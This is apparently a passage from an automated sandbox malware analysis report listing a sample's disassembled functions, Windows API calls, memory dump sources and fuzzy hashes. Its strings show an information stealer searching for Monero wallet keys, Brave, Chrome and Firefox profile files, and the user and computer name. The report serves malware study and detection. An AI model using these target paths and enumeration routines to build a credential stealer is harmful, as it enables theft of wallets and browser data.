                    • ExitProcess.KERNEL32 ref: 003B1143
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$AllocCurrentExitNumaVirtual
                    • String ID:
                    • API String ID: 1103761159-0
                    • Opcode ID: dfd3ba0a6c18272f46cc2ba0d05b4d2d9caac028db7365aad86fb40ef4954d8c
                    • Instruction ID: 16493c11ffa36b2e6085d8d4110f41308b8dd2d1878b7cde9bb619007dd5fa8e
                    • Opcode Fuzzy Hash: dfd3ba0a6c18272f46cc2ba0d05b4d2d9caac028db7365aad86fb40ef4954d8c
                    • Instruction Fuzzy Hash: 9CE086B0945308FBE7106BA0DC0AB587678EB04B45F500044F70CBA5C0C6F82605EA9A
                    Function 003B10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 003B10B3
                    • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 003B10F7
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Virtual$AllocFree
                    • String ID:
                    • API String ID: 2087232378-0
                    • Opcode ID: 4b48b97e0f27016e261e9784790e87f3d2f83dd221151b0afdeb34df0d4f3e33
                    • Instruction ID: a547e31f6553f2c8b07235ca2967542b870e2044e966d081930935346246b45d
                    • Opcode Fuzzy Hash: 4b48b97e0f27016e261e9784790e87f3d2f83dd221151b0afdeb34df0d4f3e33
                    • Instruction Fuzzy Hash: CAF0E2B1641208BBE714ABA4AC59FBAB7E8E705B15F300448F608E7280D572AF04DAA1
                    Function 003B1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 003C78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C7910
                      • Part of subcall function 003C78E0: RtlAllocateHeap.NTDLL(00000000), ref: 003C7917
                      • Part of subcall function 003C78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 003C792F
                      • Part of subcall function 003C7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003B11B7), ref: 003C7880
                      • Part of subcall function 003C7850: RtlAllocateHeap.NTDLL(00000000), ref: 003C7887
                      • Part of subcall function 003C7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 003C789F
                    • ExitProcess.KERNEL32 ref: 003B11C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                    • String ID:
                    • API String ID: 3550813701-0
                    • Opcode ID: ae8c213dbd60eac26982f3048f80428b95467a8d7d9ad7764d7f581ae5e72c0e
                    • Instruction ID: 1d806d81104ee076c3e1711b2f877e85126436ec45466310670021ab372e1ef5
                    • Opcode Fuzzy Hash: ae8c213dbd60eac26982f3048f80428b95467a8d7d9ad7764d7f581ae5e72c0e
                    • Instruction Fuzzy Hash: BDE0ECB991430152DA0173B5AC1BF2A339C5B24749F040428FF09DA502FA29ED04DA67

                    Non-executed Functions

                    Function 003C38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                    Download Yara Rule
                    APIs
                    • wsprintfA.USER32 ref: 003C38CC
                    • FindFirstFileA.KERNEL32(?,?), ref: 003C38E3
                    • lstrcat.KERNEL32(?,?), ref: 003C3935
                    • StrCmpCA.SHLWAPI(?,003D0F70), ref: 003C3947
                    • StrCmpCA.SHLWAPI(?,003D0F74), ref: 003C395D
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 003C3C67
                    • FindClose.KERNEL32(000000FF), ref: 003C3C7C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                    • API String ID: 1125553467-2524465048
                    • Opcode ID: bcd048cacf957a2336e2eb5e211cb6919c050619fe932facd5a4b276625b5b02
                    • Instruction ID: d100b5e6f64f0fc063cb9deafe4d031c21b507481f025fb29978c3ea73de79ce
                    • Opcode Fuzzy Hash: bcd048cacf957a2336e2eb5e211cb6919c050619fe932facd5a4b276625b5b02
                    • Instruction Fuzzy Hash: 3CA11FB29002189BDB25EB64DC85FFE7379BB58700F04858DE60DD6141EB759B88CF62
                    Function 003BBE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                    • FindFirstFileA.KERNEL32(00000000,?,003D0B32,003D0B2B,00000000,?,?,?,003D13F4,003D0B2A), ref: 003BBEF5
                    • StrCmpCA.SHLWAPI(?,003D13F8), ref: 003BBF4D
                    • StrCmpCA.SHLWAPI(?,003D13FC), ref: 003BBF63
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 003BC7BF
                    • FindClose.KERNEL32(000000FF), ref: 003BC7D1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                    • API String ID: 3334442632-726946144
                    • Opcode ID: fd0d50910f226d212c98d2e3c45cd025e8b90e4ad75df8cd163f43a07beab093
                    • Instruction ID: 6df49409570f79f787eab31721544b4a32ba33fc9a0099d665ab035fcd2a5e87
                    • Opcode Fuzzy Hash: fd0d50910f226d212c98d2e3c45cd025e8b90e4ad75df8cd163f43a07beab093
                    • Instruction Fuzzy Hash: E7424172910208ABCB16FBA0DD56FED737DAB94304F40455CB50ADA181EE34AF49CBA2
                    Function 003C4910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                    Download Yara Rule
                    APIs
                    • wsprintfA.USER32 ref: 003C492C
                    • FindFirstFileA.KERNEL32(?,?), ref: 003C4943
                    • StrCmpCA.SHLWAPI(?,003D0FDC), ref: 003C4971
                    • StrCmpCA.SHLWAPI(?,003D0FE0), ref: 003C4987
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 003C4B7D
                    • FindClose.KERNEL32(000000FF), ref: 003C4B92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\%s$%s\%s$%s\*
                    • API String ID: 180737720-445461498
                    • Opcode ID: a5356c46127db98b7d515bb8a6529bf0d3582db4a1f47908ed97860c7fd955fd
                    • Instruction ID: eddd97862906906f075b95d25ca67f360c63fa4247b087b0f71bf903429f4ca7
                    • Opcode Fuzzy Hash: a5356c46127db98b7d515bb8a6529bf0d3582db4a1f47908ed97860c7fd955fd
                    • Instruction Fuzzy Hash: 446143B2900218ABCB25EBA0DC55FFA737CBB58700F04458DE64DD6141EB75AB49CFA2
                    Function 003C4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003C4580
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003C4587
                    • wsprintfA.USER32 ref: 003C45A6
                    • FindFirstFileA.KERNEL32(?,?), ref: 003C45BD
                    • StrCmpCA.SHLWAPI(?,003D0FC4), ref: 003C45EB
                    • StrCmpCA.SHLWAPI(?,003D0FC8), ref: 003C4601
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 003C468B
                    • FindClose.KERNEL32(000000FF), ref: 003C46A0
                    • lstrcat.KERNEL32(?,0118F9C8), ref: 003C46C5
                    • lstrcat.KERNEL32(?,0118E410), ref: 003C46D8
                    • lstrlen.KERNEL32(?), ref: 003C46E5
                    • lstrlen.KERNEL32(?), ref: 003C46F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                    • String ID: %s\%s$%s\*
                    • API String ID: 671575355-2848263008
                    • Opcode ID: 6cc8881169fa7666e191d7ef0f0f8dc0e72dc8f964c3b9b8e056bc5bf0f42634
                    • Instruction ID: da9fc257f4bdeeac3befd856386d896b1fbb3d644005a4b51e11fdc9cf03de30
                    • Opcode Fuzzy Hash: 6cc8881169fa7666e191d7ef0f0f8dc0e72dc8f964c3b9b8e056bc5bf0f42634
                    • Instruction Fuzzy Hash: 0C5155B29002189BC725EB70DC99FF9737CAB58700F404589F60DD6150EB759B89CFA2
                    Function 003C3EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                    Download Yara Rule
                    APIs
                    • wsprintfA.USER32 ref: 003C3EC3
                    • FindFirstFileA.KERNEL32(?,?), ref: 003C3EDA
                    • StrCmpCA.SHLWAPI(?,003D0FAC), ref: 003C3F08
                    • StrCmpCA.SHLWAPI(?,003D0FB0), ref: 003C3F1E
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 003C406C
                    • FindClose.KERNEL32(000000FF), ref: 003C4081
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\%s
                    • API String ID: 180737720-4073750446
                    • Opcode ID: f371cfb9a96fdd8b6a16076b56890c7b6ecb5e22ae64201bfda9fc796562259b
                    • Instruction ID: 0ae97cde06227abe8a5e156c2689f9517c932902129a64a4dbd54c0765aa2c26
                    • Opcode Fuzzy Hash: f371cfb9a96fdd8b6a16076b56890c7b6ecb5e22ae64201bfda9fc796562259b
                    • Instruction Fuzzy Hash: 925101B2900218ABCB25EBA0DC45FFA737CBB58700F40458DB65DD6140EB75AB89DF52
                    Function 003BED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                    Download Yara Rule
                    APIs
                    • wsprintfA.USER32 ref: 003BED3E
                    • FindFirstFileA.KERNEL32(?,?), ref: 003BED55
                    • StrCmpCA.SHLWAPI(?,003D1538), ref: 003BEDAB
                    • StrCmpCA.SHLWAPI(?,003D153C), ref: 003BEDC1
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 003BF2AE
                    • FindClose.KERNEL32(000000FF), ref: 003BF2C3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\*.*
                    • API String ID: 180737720-1013718255
                    • Opcode ID: f088188a00a4f208c9097435934d6be68dc08b800b660a0091884ba675d2bf85
                    • Instruction ID: e18af265c2f1ec67bab2880a0eacd616d4fe1e4fea6df826672053ea7d1ba6e4
                    • Opcode Fuzzy Hash: f088188a00a4f208c9097435934d6be68dc08b800b660a0091884ba675d2bf85
                    • Instruction Fuzzy Hash: 8DE12D7281161C9BDB16EB60DC52FEE7738AF54304F40419DB50AAA092EF306F8ADF52
                    Function 003BF6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003D15B8,003D0D96), ref: 003BF71E
                    • StrCmpCA.SHLWAPI(?,003D15BC), ref: 003BF76F
                    • StrCmpCA.SHLWAPI(?,003D15C0), ref: 003BF785
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 003BFAB1
                    • FindClose.KERNEL32(000000FF), ref: 003BFAC3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID: prefs.js
                    • API String ID: 3334442632-3783873740
                    • Opcode ID: d77bf2dd91b21de5e53ade630d45d31a2a7379041993d4651e10308a2dce8628
                    • Instruction ID: 9b3ce9b5916bb5da73f4bc6c4d89b1e6ede926bbbecb6a168e0fc834dddccf87
                    • Opcode Fuzzy Hash: d77bf2dd91b21de5e53ade630d45d31a2a7379041993d4651e10308a2dce8628
                    • Instruction Fuzzy Hash: 2CB14E719006089BCB26EB60DC96FEE7779AF54304F4085ADA50ADA181EF306F49CF92
                    Function 003B16D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003D510C,?,?,?,003D51B4,?,?,00000000,?,00000000), ref: 003B1923
